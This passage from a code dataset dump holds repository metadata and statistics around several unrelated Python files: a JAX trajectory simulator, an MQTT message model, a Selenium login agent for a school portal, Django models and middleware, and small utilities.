] | 1 | 2016-09-23T00:45:05.000Z | 2019-02-16T19:05:37.000Z | underscore/declaration.py | jameswu1991/Underscore | d98273db3144cda79191d2c90f45d81b6d700b1f | [
"MIT"
] | 3 | 2016-09-23T01:13:15.000Z | 2018-07-20T21:22:17.000Z | # Copyright (c) 2013 Huan Do, http://huan.do
class Declaration(object):

    def __init__(self, name):
        self.name = name
        self.delete = False
        self._conditional = None

    @property
    def conditional(self):
        assert self._conditional is not None
        return self.delete or self._conditional


def generator():
    _ = '_'
    while True:
        # yield Declaration('_' + str(len(_)))
        yield Declaration(_)
        _ += '_'
| 23.15 | 47 | 0.593952 | 50 | 463 | 5.22 | 0.58 | 0.172414 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01227 | 0.295896 | 463 | 19 | 48 | 24.368421 | 0.788344 | 0.170626 | 0 | 0 | 0 | 0 | 0.005249 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 1 | 0.214286 | false | 0 | 0 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d810e9e8b14b2edde01e890b4f74510b0b268466 | 312 | py | Python | camara_con_kivy.py | Rocha117/Laboratorio_07 | 1d1b646f9665523962a7d8addf16b056f437bc27 | [
"MIT"
] | null | null | null | camara_con_kivy.py | Rocha117/Laboratorio_07 | 1d1b646f9665523962a7d8addf16b056f437bc27 | [
"MIT"
] | null | null | null | camara_con_kivy.py | Rocha117/Laboratorio_07 | 1d1b646f9665523962a7d8addf16b056f437bc27 | [
"MIT"
] | null | null | null | from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
class CamaraWindow(BoxLayout):
    def __init__(self, **kwargs):
        super().__init__(**kwargs)


class CamaraApp(App):
    def build(self):
        return CamaraWindow()


if __name__ == '__main__':
    CamaraApp().run()
CamaraApp().run() | 22.285714 | 41 | 0.634615 | 34 | 312 | 5.352941 | 0.588235 | 0.087912 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246795 | 312 | 14 | 42 | 22.285714 | 0.774468 | 0 | 0 | 0 | 0 | 0 | 0.026667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.1 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d813fe7e8c53a4b341a427a7aa1d706dae039f16 | 310 | py | Python | dockernd/python/ND/NostalgiaDrive/setup.py | mchellmer/DockerMongoFceuxPython | f7db8fc976d76046ca03f707f9845d348f9be651 | [
"MIT"
] | null | null | null | dockernd/python/ND/NostalgiaDrive/setup.py | mchellmer/DockerMongoFceuxPython | f7db8fc976d76046ca03f707f9845d348f9be651 | [
"MIT"
] | null | null | null | dockernd/python/ND/NostalgiaDrive/setup.py | mchellmer/DockerMongoFceuxPython | f7db8fc976d76046ca03f707f9845d348f9be651 | [
"MIT"
] | null | null | null | from setuptools import setup
setup(
    name='nd',
    py_modules=['nd'],
    version='1.0.0',
    description='user friendly emulation game selection',
    license="MIT",
    author='Mark Hellmer',
    author_email='mchellmer@gmail.com',
    install_requires=['tkinter', 'nltk', 'pymongo'],
    scripts=[]
)
| 22.142857 | 57 | 0.645161 | 36 | 310 | 5.472222 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011952 | 0.190323 | 310 | 13 | 58 | 23.846154 | 0.772908 | 0 | 0 | 0 | 0 | 0 | 0.319355 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d81683ba8142b60ee8046ff652ca3747377a9744 | 4,729 | py | Python | generate_data.py | StanfordASL/Adaptive-Control-Oriented-Meta-Learning | 093d2764314bbfccc3a804fb9e737a10d08a1eb5 | [
"MIT"
] | 24 | 2021-03-14T19:00:49.000Z | 2022-03-23T14:31:33.000Z | generate_data.py | wuyou33/Adaptive-Control-Oriented-Meta-Learning | 093d2764314bbfccc3a804fb9e737a10d08a1eb5 | [
"MIT"
] | 1 | 2021-06-07T09:57:26.000Z | 2021-06-12T19:57:00.000Z | generate_data.py | wuyou33/Adaptive-Control-Oriented-Meta-Learning | 093d2764314bbfccc3a804fb9e737a10d08a1eb5 | [
"MIT"
] | 3 | 2021-06-14T09:05:27.000Z | 2021-12-22T19:31:15.000Z | """
TODO description.

Author: Spencer M. Richards
Autonomous Systems Lab (ASL), Stanford
(GitHub: spenrich)
"""

if __name__ == "__main__":
    import pickle
    import jax
    import jax.numpy as jnp
    from jax.experimental.ode import odeint

    from utils import spline, random_ragged_spline
    from dynamics import prior, plant, disturbance

    # Seed random numbers
    seed = 0
    key = jax.random.PRNGKey(seed)

    # Generate smooth trajectories
    num_traj = 500
    T = 30
    num_knots = 6
    poly_orders = (9, 9, 6)
    deriv_orders = (4, 4, 2)
    min_step = jnp.array([-2., -2., -jnp.pi/6])
    max_step = jnp.array([2., 2., jnp.pi/6])
    min_knot = jnp.array([-jnp.inf, -jnp.inf, -jnp.pi/3])
    max_knot = jnp.array([jnp.inf, jnp.inf, jnp.pi/3])

    key, *subkeys = jax.random.split(key, 1 + num_traj)
    subkeys = jnp.vstack(subkeys)
    in_axes = (0, None, None, None, None, None, None, None, None)
    t_knots, knots, coefs = jax.vmap(random_ragged_spline, in_axes)(
        subkeys, T, num_knots, poly_orders, deriv_orders,
        min_step, max_step, min_knot, max_knot
    )
    # x_coefs, y_coefs, ϕ_coefs = coefs
    r_knots = jnp.dstack(knots)

    # Sampled-time simulator
    @jax.partial(jax.vmap, in_axes=(None, 0, 0, 0))
    def simulate(ts, w, t_knots, coefs,
                 plant=plant, prior=prior, disturbance=disturbance):
        """TODO: docstring."""
        # Construct spline reference trajectory
        def reference(t):
            x_coefs, y_coefs, ϕ_coefs = coefs
            x = spline(t, t_knots, x_coefs)
            y = spline(t, t_knots, y_coefs)
            ϕ = spline(t, t_knots, ϕ_coefs)
            ϕ = jnp.clip(ϕ, -jnp.pi/3, jnp.pi/3)
            r = jnp.array([x, y, ϕ])
            return r

        # Required derivatives of the reference trajectory
        def ref_derivatives(t):
            ref_vel = jax.jacfwd(reference)
            ref_acc = jax.jacfwd(ref_vel)
            r = reference(t)
            dr = ref_vel(t)
            ddr = ref_acc(t)
            return r, dr, ddr

        # Feedback linearizing PD controller
        def controller(q, dq, r, dr, ddr):
            kp, kd = 10., 0.1
            e, de = q - r, dq - dr
            dv = ddr - kp*e - kd*de
            H, C, g, B = prior(q, dq)
            τ = H@dv + C@dq + g
            u = jnp.linalg.solve(B, τ)
            return u, τ

        # Closed-loop ODE for `x = (q, dq)`, with a zero-order hold on
        # the controller
        def ode(x, t, u, w=w):
            q, dq = x
            f_ext = disturbance(q, dq, w)
            ddq = plant(q, dq, u, f_ext)
            dx = (dq, ddq)
            return dx

        # Simulation loop
        def loop(carry, input_slice):
            t_prev, q_prev, dq_prev, u_prev = carry
            t = input_slice
            qs, dqs = odeint(ode, (q_prev, dq_prev), jnp.array([t_prev, t]),
                             u_prev)
            q, dq = qs[-1], dqs[-1]
            r, dr, ddr = ref_derivatives(t)
            u, τ = controller(q, dq, r, dr, ddr)
            carry = (t, q, dq, u)
            output_slice = (q, dq, u, τ, r, dr)
            return carry, output_slice

        # Initial conditions
        t0 = ts[0]
        r0, dr0, ddr0 = ref_derivatives(t0)
        q0, dq0 = r0, dr0
        u0, τ0 = controller(q0, dq0, r0, dr0, ddr0)

        # Run simulation loop
        carry = (t0, q0, dq0, u0)
        carry, output = jax.lax.scan(loop, carry, ts[1:])
        q, dq, u, τ, r, dr = output

        # Prepend initial conditions
        q = jnp.vstack((q0, q))
        dq = jnp.vstack((dq0, dq))
        u = jnp.vstack((u0, u))
        τ = jnp.vstack((τ0, τ))
        r = jnp.vstack((r0, r))
        dr = jnp.vstack((dr0, dr))

        return q, dq, u, τ, r, dr

    # Sample wind velocities from the training distribution
    w_min = 0.  # minimum wind velocity in inertial `x`-direction
    w_max = 6.  # maximum wind velocity in inertial `x`-direction
    a = 5.      # shape parameter `a` for beta distribution
    b = 9.      # shape parameter `b` for beta distribution
    key, subkey = jax.random.split(key, 2)
    w = w_min + (w_max - w_min)*jax.random.beta(subkey, a, b, (num_traj,))

    # Simulate tracking for each `w`
    dt = 0.01
    t = jnp.arange(0, T + dt, dt)  # same times for each trajectory
    q, dq, u, τ, r, dr = simulate(t, w, t_knots, coefs)

    data = {
        'seed': seed, 'prng_key': key,
        't': t, 'q': q, 'dq': dq,
        'u': u, 'r': r, 'dr': dr,
        't_knots': t_knots, 'r_knots': r_knots,
        'w': w, 'w_min': w_min, 'w_max': w_max,
        'beta_params': (a, b),
    }
    with open('training_data.pkl', 'wb') as file:
        pickle.dump(data, file)
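
The controller inside `simulate` first forms a PD acceleration command `dv = ddr - kp*e - kd*de` and then maps it through the prior dynamics. A scalar sketch of just the PD part, using the same gains (illustrative values, independent of the JAX code above):

```python
def pd_accel(q, dq, r, dr, ddr, kp=10.0, kd=0.1):
    # Position and velocity tracking errors
    e, de = q - r, dq - dr
    # Feedforward reference acceleration plus PD feedback
    return ddr - kp * e - kd * de

# On the reference (zero tracking error), the command reduces to the
# feedforward acceleration ddr.
cmd = pd_accel(q=1.0, dq=2.0, r=1.0, dr=2.0, ddr=0.5)
# cmd == 0.5
```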
| 33.06993 | 76 | 0.534574 | 695 | 4,729 | 3.513669 | 0.267626 | 0.018428 | 0.029484 | 0.03276 | 0.135135 | 0.127764 | 0.072891 | 0.04095 | 0.02457 | 0.02457 | 0 | 0.022518 | 0.333263 | 4,729 | 142 | 77 | 33.302817 | 0.751982 | 0.173398 | 0 | 0 | 0 | 0 | 0.021408 | 0 | 0 | 0 | 0 | 0.014085 | 0 | 1 | 0.058824 | false | 0 | 0.058824 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d81bf2a69ea31df5d99253836392c80819c38099 | 5,633 | py | Python | pkg/msgapi/mqtt/models/mqmsg.py | ToraNova/rapidflask | f42354b296659dac5be904d7bb68076b9458f79a | [
"MIT"
] | null | null | null | pkg/msgapi/mqtt/models/mqmsg.py | ToraNova/rapidflask | f42354b296659dac5be904d7bb68076b9458f79a | [
"MIT"
] | null | null | null | pkg/msgapi/mqtt/models/mqmsg.py | ToraNova/rapidflask | f42354b296659dac5be904d7bb68076b9458f79a | [
"MIT"
] | null | null | null | #--------------------------------------------------
# mqtt_control.py
# MQTT_Control is a database model to control subscriptions
# and publications
# introduced in u8
# ToraNova
#--------------------------------------------------

from pkg.resrc import res_import as r
from pkg.system.database import dbms

Base = dbms.msgapi.base


class MQTT_Msg(Base):
    # PERMA : DO NOT CHANGE ANYTHING HERE UNLESS NECESSARY
    __tablename__ = "MQTT_Msgs"  # Try to use plurals here (i.e. cars)
    id = r.Column(r.Integer, primary_key=True)

    def __repr__(self):
        return '<%r %r>' % (self.__tablename__, self.id)
    #---------------------------------------------------------

    ######################################################################################################
    # EDITABLE ZONE
    ######################################################################################################

    # TODO: DEFINE LIST OF COLUMNS
    # the string topic of the topic to subscribe to
    topic = r.Column(r.String(r.lim.MAX_MQTT_TOPIC_SIZE), nullable=False)
    tlink = r.Column(r.Integer, nullable=True)  # links to one of our subscribed topics
    msg = r.Column(r.String(r.lim.MAX_MQTT_MSGCT_SIZE), nullable=False)
    timev0 = r.Column(r.DateTime, nullable=False)  # insertion time
    timed0 = r.Column(r.DateTime, nullable=True)  # deletion time (msg to be kept until)
    pflag0 = r.Column(r.Boolean, nullable=False)  # flag to check if the msg has been processed
    pflag1 = r.Column(r.Boolean, nullable=False)  # flag to check if the msg has been processed successfully
    delonproc = r.Column(r.Boolean, nullable=False)  # flag to check if this message should be deleted on process

    # TODO: DEFINE THE RLIST
    # CHANGED ON U6 : RLISTING NOW MERGED WITH RLINKING : see 'RLINKING _ HOW TO USE:'
    # The following is for r-listing (as of u6, rlinking as well) (resource listing)
    # the values in the rlist must be the same as the column var name
    rlist = r.OrderedDict([
        ("Topic", "topic"),
        ("Linked (description)", "__link__/tlink/MQTT_Subs/id:description"),
        ("Content", "msg"),
        ("Received", "__time__/%b-%d-%Y %H:%M:%S/timev0"),
        ("Delete on", "__time__/%b-%d-%Y %H:%M:%S/timed0"),
        ("Processed?", "pflag0"),
        ("Process OK?", "pflag1")
    ])  # header, row data

    # RLINKING _ HOW TO USE :
    # using the __link__ keyword, separate the arguments with /
    # The first argument is the local reference, the field which we use to refer
    # the second argument is the foreign table
    # the third argument is the foreign table's primary key
    # the fourth argument is the field we want to find from the foreign table
    # NOTICE that the fourth argument uses ':' instead of /.
    # Example:
    #   "RPi id": "__link__/rpi_id/RPi/id:rpi_name"
    # For the display of RPi id, we link to a foreign table called RPi.
    # We use the rpi_id foreign key on this table to locate the id on the
    # foreign table, then we query for the field rpi_name.

    # TODO: DEFINE THE priKey and display text
    # this primary key is used for rlisting/adding and mod.
    rlist_priKey = "id"
    rlist_dis = "MQTT Message Stack"  # display for r routes

    def get_onrecv(self):
        # get the name of the process used on this msg
        from pkg.msgapi.mqtt.models import MQTT_Sub
        t = MQTT_Sub.query.filter(MQTT_Sub.id == self.tlink).first()
        if t is not None:
            return t.onrecv

    # TODO: CONSTRUCTOR DEFINES, PLEASE ADD IN ACCORDING TO COLUMNS
    # the key in the insert_list must be the same as the column var name
    def __init__(self, insert_list):
        '''requirements in insert_list
        @param tlink - link to the mqtt sub record
        @param topic - the topic string (in case linking failed)
        @param msg - the msg content'''
        from pkg.msgapi.mqtt.models import MQTT_Sub
        from pkg.system.servlog import srvlog
        import datetime
        from datetime import timedelta

        # find links
        self.tlink = r.checkNull(insert_list, "tlink")
        self.topic = insert_list["topic"]
        self.msg = insert_list["msg"]
        self.timev0 = datetime.datetime.now()
        self.pflag0 = insert_list["pflag0"]
        self.pflag1 = insert_list["pflag1"]

        submaster = MQTT_Sub.query.filter(MQTT_Sub.id == self.tlink).first()
        if submaster is not None:
            if submaster.stordur is None:
                self.timed0 = None  # store forever
            else:
                self.timed0 = self.timev0 + timedelta(seconds=submaster.stordur)
            self.delonproc = submaster.delonproc  # inherits from the topic master
        else:
            srvlog["oper"].warning("MQTT message added to unknown link topic:" + self.topic +
                                   " id=" + str(self.tlink))
            self.timed0 = r.lim.DEF_MQTT_MSGST_DURA
            self.delonproc = True

    def default_add_action(self):
        # This will be run when the table is added via r-add
        # may do some imports here i.e (from pkg.database.fsqlite import db_session)
        # TODO add a MQTT restart function here
        pass

    def default_mod_action(self):
        # This will be run when the table is modified via r-mod
        # may do some imports here i.e (from pkg.database.fsqlite import db_session)
        pass

    def default_del_action(self):
        # This will be run when the table is deleted
        # may do some imports here i.e (from pkg.database.fsqlite import db_session)
        pass

######################################################################################################
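
The "RLINKING _ HOW TO USE" notes above describe a slash-separated spec string. A sketch of how such a spec could be unpacked (hypothetical parser, not part of the module):

```python
def parse_link_spec(spec):
    # Format: '__link__/<local ref>/<foreign table>/<foreign PK>:<foreign field>'
    marker, local_ref, foreign_table, tail = spec.split('/')
    if marker != '__link__':
        raise ValueError('not a link spec: ' + spec)
    # Only the last argument uses ':' as its separator
    foreign_key, foreign_field = tail.split(':')
    return local_ref, foreign_table, foreign_key, foreign_field

parsed = parse_link_spec('__link__/tlink/MQTT_Subs/id:description')
# parsed == ('tlink', 'MQTT_Subs', 'id', 'description')
```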
| 46.172131 | 110 | 0.607314 | 763 | 5,633 | 4.373526 | 0.306684 | 0.018879 | 0.021576 | 0.013485 | 0.258016 | 0.228648 | 0.228648 | 0.222655 | 0.186095 | 0.167516 | 0 | 0.004598 | 0.227765 | 5,633 | 121 | 111 | 46.553719 | 0.762529 | 0.442393 | 0 | 0.114754 | 0 | 0 | 0.110788 | 0.014166 | 0 | 0 | 0 | 0.016529 | 0 | 1 | 0.098361 | false | 0.04918 | 0.114754 | 0.016393 | 0.47541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d82a5e6a7cb6b7c55c3841490f1226e6b98ca874 | 2,108 | py | Python | base/vulcan_management/vulcan_agent.py | PeterStuck/teacher-app | e71c5b69019450a9ac8694fb461d343ce33e1b35 | [
"CC0-1.0"
] | null | null | null | base/vulcan_management/vulcan_agent.py | PeterStuck/teacher-app | e71c5b69019450a9ac8694fb461d343ce33e1b35 | [
"CC0-1.0"
] | null | null | null | base/vulcan_management/vulcan_agent.py | PeterStuck/teacher-app | e71c5b69019450a9ac8694fb461d343ce33e1b35 | [
"CC0-1.0"
] | null | null | null | from time import sleep
from selenium.common.exceptions import NoSuchElementException
from .vulcan_webdriver import VulcanWebdriver
class VulcanAgent:
    """ Class to perform actions on Vulcan Uonet page """

    def __init__(self, credentials: dict, vulcan_data=None):
        self.driver = VulcanWebdriver()
        self.driver.open_vulcan_page()
        self.credentials = (credentials['email'], credentials['password'])
        self.vd = vulcan_data

    def go_to_lessons_menu(self):
        self.login_into_service()
        sleep(1)
        self.__select_department()
        sleep(1.5)

    def login_into_service(self):
        """ Logs into Vulcan Uonet with the passed credentials """
        try:
            self.driver.find_element_by_css_selector(".loginButton").click()
            self.__send_credentials()
        except NoSuchElementException as e:
            print(e)
            self.driver.execute_script("alert('#Error# Nie udało się znaleźć przycisku logowania.');")

    def __send_credentials(self):
        """ Pastes login data into the fields on the page and submits them """
        try:
            email_input = self.driver.find_element_by_css_selector("#LoginName")
            email_input.send_keys(self.credentials[0])

            pass_input = self.driver.find_element_by_css_selector("#Password")
            pass_input.send_keys(self.credentials[1])

            login_submit_btn = self.driver.find_element_by_xpath('//input[@value="Zaloguj się >"]')
            login_submit_btn.click()
        except NoSuchElementException as e:
            print(e)
            self.driver.execute_script(
                "alert('#Error# Problem ze znalezieniem elementów lub wprowadzeniem danych do zalogowania.');")

    def __select_department(self):
        """ Selects the department on the main page """
        try:
            self.driver.find_element_by_xpath(f'//span[text()="{self.vd.department}"]/..').click()
        except NoSuchElementException as e:
            print(e)
            self.driver.execute_script("alert('#Error# Problem ze znalezieniem podanego departamentu.');")
| 36.982456 | 111 | 0.6537 | 239 | 2,108 | 5.518828 | 0.401674 | 0.075815 | 0.053071 | 0.079606 | 0.37301 | 0.330553 | 0.283548 | 0.257771 | 0.198635 | 0.198635 | 0 | 0.003129 | 0.241935 | 2,108 | 56 | 112 | 37.642857 | 0.822278 | 0.086338 | 0 | 0.230769 | 0 | 0 | 0.174302 | 0.033175 | 0 | 0 | 0 | 0 | 0 | 1 | 0.128205 | false | 0.076923 | 0.076923 | 0 | 0.230769 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d82fafa5745811141dbc5de3b45d1ba61dddabe7 | 378 | py | Python | Dataset/Leetcode/valid/6/243.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/valid/6/243.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/valid/6/243.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution(object):
    def XXX(self, s, numRows):
        if numRows == 1:
            return s
        res = ['' for _ in range(numRows)]
        # period of the zigzag pattern
        T = numRows + numRows - 2
        for i in range(len(s)):
            t_num = i % T
            temp = t_num if t_num < numRows else numRows - t_num % numRows - 2
            res[temp] += s[i]
        return ''.join(res)
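
The row index in the loop above follows from the zigzag period `T = 2*numRows - 2`: indices walk down the rows and back up within each period. The same mapping, isolated as a standalone function (illustrative rewrite, assuming `numRows >= 2`):

```python
def zigzag_row(i, num_rows):
    period = 2 * num_rows - 2
    t = i % period
    # For t >= num_rows this equals num_rows - t % num_rows - 2, the form
    # used in the solution above.
    return t if t < num_rows else period - t

rows = [zigzag_row(i, 3) for i in range(8)]
# rows == [0, 1, 2, 1, 0, 1, 2, 1]
```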
| 27 | 72 | 0.486772 | 53 | 378 | 3.377358 | 0.45283 | 0.089385 | 0.122905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012987 | 0.388889 | 378 | 13 | 73 | 29.076923 | 0.761905 | 0.005291 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d8334d756e7256b282d32ab1967e513fc5ca0140 | 390 | py | Python | src/chains/migrations/0027_chain_description.py | tharsis/safe-config-service | 5335fd006d05fba5b13b477daca9f6ef6d64b818 | [
"MIT"
] | 8 | 2021-07-27T13:21:27.000Z | 2022-02-12T22:46:26.000Z | src/chains/migrations/0027_chain_description.py | protofire/safe-config-service | 6a9a48f5e33950cd5f4f7a66c5e36f4d3b0f2bfa | [
"MIT"
] | 203 | 2021-04-28T08:23:29.000Z | 2022-03-29T15:50:27.000Z | src/chains/migrations/0027_chain_description.py | protofire/safe-config-service | 6a9a48f5e33950cd5f4f7a66c5e36f4d3b0f2bfa | [
"MIT"
] | 23 | 2021-06-25T07:22:31.000Z | 2022-03-29T02:24:46.000Z | # Generated by Django 3.2.7 on 2021-09-16 12:38
from django.db import migrations, models
class Migration(migrations.Migration):

    dependencies = [
        ("chains", "0026_chain_l2"),
    ]

    operations = [
        migrations.AddField(
            model_name="chain",
            name="description",
            field=models.CharField(blank=True, max_length=255),
        ),
    ]
| 20.526316 | 63 | 0.594872 | 43 | 390 | 5.302326 | 0.837209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082734 | 0.287179 | 390 | 18 | 64 | 21.666667 | 0.73741 | 0.115385 | 0 | 0 | 1 | 0 | 0.102041 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d8346003220ff71079a13d30e7158a1ac6606e62 | 1,288 | py | Python | leases/services/invoice/berth.py | City-of-Helsinki/berth-reservations | a3b1a8c2176f132505527acdf6da3a62199401db | [
"MIT"
] | 3 | 2020-10-13T07:58:48.000Z | 2020-12-22T09:41:50.000Z | leases/services/invoice/berth.py | City-of-Helsinki/berth-reservations | a3b1a8c2176f132505527acdf6da3a62199401db | [
"MIT"
] | 422 | 2018-10-25T10:57:05.000Z | 2022-03-30T05:47:14.000Z | leases/services/invoice/berth.py | City-of-Helsinki/berth-reservations | a3b1a8c2176f132505527acdf6da3a62199401db | [
"MIT"
] | 1 | 2020-04-03T07:38:03.000Z | 2020-04-03T07:38:03.000Z | from datetime import date
from django.db.models import QuerySet
from payments.enums import OrderStatus
from payments.models import BerthProduct, Order
from ...models import BerthLease
from ...utils import calculate_season_end_date, calculate_season_start_date
from .base import BaseInvoicingService
class BerthInvoicingService(BaseInvoicingService):
def __init__(self, *args, **kwargs):
super(BerthInvoicingService, self).__init__(*args, **kwargs)
self.season_start = calculate_season_start_date()
self.season_end = calculate_season_end_date()
@staticmethod
def get_product(lease: BerthLease) -> BerthProduct:
# The berth product is determined by the width of the berth of the lease
return BerthProduct.objects.get_in_range(width=lease.berth.berth_type.width)
@staticmethod
def get_valid_leases(season_start: date) -> QuerySet:
return BerthLease.objects.get_renewable_leases(season_start=season_start)
@staticmethod
def get_failed_orders(season_start: date) -> QuerySet:
leases = BerthLease.objects.filter(
start_date__year=season_start.year
).values_list("id")
return Order.objects.filter(
_lease_object_id__in=leases, status=OrderStatus.ERROR
)
| 34.810811 | 84 | 0.743789 | 154 | 1,288 | 5.922078 | 0.376623 | 0.096491 | 0.065789 | 0.048246 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.180901 | 1,288 | 36 | 85 | 35.777778 | 0.864455 | 0.054348 | 0 | 0.115385 | 0 | 0 | 0.001645 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.269231 | 0.076923 | 0.576923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
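`BerthProduct.objects.get_in_range` is a custom manager method not shown in this file; a plain-Python sketch of the width-bracket lookup it presumably performs — the bracket boundaries and product names below are made up for illustration:

```python
from decimal import Decimal

# Hypothetical price brackets: (min width inclusive, max width exclusive, product).
BRACKETS = [
    (Decimal("0"), Decimal("2"), "S berth"),
    (Decimal("2"), Decimal("3"), "M berth"),
    (Decimal("3"), Decimal("999"), "L berth"),
]

def get_in_range(width):
    """Return the product whose width bracket contains `width`."""
    for lo, hi, product in BRACKETS:
        if lo <= width < hi:
            return product
    raise LookupError(f"no product for width {width}")

print(get_in_range(Decimal("2.5")))  # M berth
```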
d83b93f39c486d9317c825bf51df461bf2aebcdf | 440 | py | Python | django_request_context/middleware.py | schecterdamien/django-request-context | db1100b611012835fd8528c2ba4848ed87e10f80 | [
"MIT"
] | 13 | 2018-11-01T08:10:54.000Z | 2021-07-09T07:42:18.000Z | django_request_context/middleware.py | schecterdamien/django-request-context | db1100b611012835fd8528c2ba4848ed87e10f80 | [
"MIT"
] | 1 | 2019-07-28T16:49:05.000Z | 2021-10-02T04:37:20.000Z | django_request_context/middleware.py | schecterdamien/django-request-context | db1100b611012835fd8528c2ba4848ed87e10f80 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .globals import request_context
try:
from django.utils.deprecation import MiddlewareMixin
except ImportError: # Django < 1.10
MiddlewareMixin = object
class RequestContextMiddleware(MiddlewareMixin):
def process_request(self, request):
request_context.init_by_request(request)
def process_response(self, request, response):
request_context.clear()
return response
| 23.157895 | 56 | 0.729545 | 47 | 440 | 6.680851 | 0.595745 | 0.133758 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011204 | 0.188636 | 440 | 18 | 57 | 24.444444 | 0.868347 | 0.079545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.272727 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
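The `try`/`except ImportError` fallback exists because `MiddlewareMixin` only appeared in Django 1.10. A simplified stand-in (not Django's actual implementation) showing what the mixin does: adapt the old `process_request`/`process_response` hooks to the new-style callable middleware protocol:

```python
class MiddlewareMixin:
    # Simplified sketch of django.utils.deprecation.MiddlewareMixin:
    # wrap get_response and call the old-style hooks around it.
    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        if hasattr(self, "process_request"):
            self.process_request(request)
        response = self.get_response(request)
        if hasattr(self, "process_response"):
            response = self.process_response(request, response)
        return response

calls = []

class Demo(MiddlewareMixin):
    def process_request(self, request):
        calls.append("request")

    def process_response(self, request, response):
        calls.append("response")
        return response

mw = Demo(lambda request: "ok")
print(mw("req"), calls)  # ok ['request', 'response']
```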
dc1c34dd0e875151a5cb78c824921a11dc907308 | 279 | py | Python | samle_python.py | sarum90/langmapper | 010b7f8b075c45f3c43dcd7d478f6bfe192ccc01 | [
"MIT"
